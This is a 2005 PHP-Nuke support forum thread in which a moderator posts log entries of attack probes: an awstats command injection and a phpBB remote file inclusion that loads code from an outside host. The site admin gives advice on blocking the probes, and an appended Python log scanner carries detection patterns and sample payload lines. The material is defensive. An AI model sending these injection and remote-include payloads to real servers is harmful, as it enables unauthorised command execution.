Ravens PHP Scripts: Forums
 

 

Susann
Moderator



Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

Posted: Wed May 25, 2005 12:55 pm

Found this in my logs and it reminded me of the awstats and phpBB discussion. But I don't wanna talk about awstats again.
My question is:
How to ban DataChaOs, and should I also ban this IP?


Code:
69.28.236.11 - - [21/May/2005:19:10:38 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 404 290 "-" "DataCha0s/2.0"
69.28.236.11 - - [21/May/2005:19:10:40 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 404 290 "-" "DataCha0s/2.0"
69.28.236.11 - - [21/May/2005:19:10:45 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 200 691 "-" "DataCha0s/2.0"
 
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

Posted: Wed May 25, 2005 1:58 pm

That's an old exploit in awstats. If you're up to date with awstats you're safe. DataCha0s/2.0 is the user agent. You can add it to your user agent blocker and/or ban the IP. However, he can forge the user agent and the IP. Here's info on the IP. It's probably a dynamic IP so it will change. You would want to "deny from whois 69.28.236.0/24" to ban all IPs in that range. I would also contact the ISP and give them the log details and you may get lucky and get his account canceled.
Code:
whois 69.28.236.11

[Querying whois.arin.net]
[whois.arin.net]
Peer 1 Network Inc. PEER1-BLK-07 (NET-69-28-192-0-1)
                                  69.28.192.0 - 69.28.255.255
Groupe iWeb Technologies inc. PEER1-IWEBHOST-05 (NET-69-28-236-0-1)
                                  69.28.236.0 - 69.28.236.255
 
Susann







Posted: Wed May 25, 2005 5:08 pm

Thank you for the information. I use the last stable version awstats 6.4.
 
Susann







Posted: Fri Jul 22, 2005 7:15 pm

I added DataChaos to the user agent blocker. Sentinel blocked the UA yesterday.


201.14.78.219 - - [22/Jul/2005:03:50:44 +0200] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://harly.dk/vcard/.xpls/cse.gif?&cmd=id HTTP/1.0" 200 1596 "-" "DataCha0s/2.0"


Yes, I know this has been fixed in 2.0.16.



I really ask myself why this forums module is still integrated in phpnuke. Maybe Bob Dylan has an answer.
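
Added example (not part of the original thread, and not NukeSentinel code): since the user agent and the IP can both be forged, as noted above, this sketch flags the probes by what the request itself contains and marks any that were answered with a 2xx status for follow-up. The rule set, the names `classify` and `scan`, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Assumed rule set modelled on the requests quoted in the thread (not NukeSentinel's own rules).
RULES = {
    "shell-metachar": re.compile(r"[|;`]|\$\("),                   # configdir=|echo;echo;id;
    "null-byte": re.compile(r"\x00"),                              # %00 once URL-decoded
    "remote-include": re.compile(r"=\s*(?:https?|ftp)://", re.I),  # parameter set to a remote URL
}

def classify(line):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    decoded = unquote(query)
    hits = sorted(name for name, rx in RULES.items() if rx.search(decoded))
    status = int(m["status"])
    # A 2xx answer does not prove the probe worked (a block page can also be 200),
    # but it means the URL was served, so the installed version should be checked.
    return {"ip": m["ip"], "agent": m["agent"], "path": path, "status": status,
            "hits": hits, "needs_review": bool(hits) and 200 <= status < 300}

def scan(lines):
    """Keep only the lines that matched at least one rule."""
    return [r for r in map(classify, lines) if r and r["hits"]]

# Constructed sample lines (documentation IPs and hosts), shaped like the ones in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2005:19:10:38 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 404 290 "-" "DataCha0s/2.0"',
    '192.0.2.10 - - [21/May/2005:19:10:45 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 200 691 "-" "DataCha0s/2.0"',
    '198.51.100.7 - - [22/Jul/2005:03:50:44 +0200] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://files.example.invalid/x.gif?&cmd=id HTTP/1.0" 200 1596 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [22/Jul/2005:04:01:02 +0200] "GET /index.php?name=News&file=article&sid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["agent"], rec["path"], rec["status"], rec["hits"],
              "REVIEW" if rec["needs_review"] else "")
```

The third sample line uses an ordinary browser user agent on purpose: a user agent blocker alone would not catch it, while the request-content rule does.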
 
All times are GMT - 6 Hours
 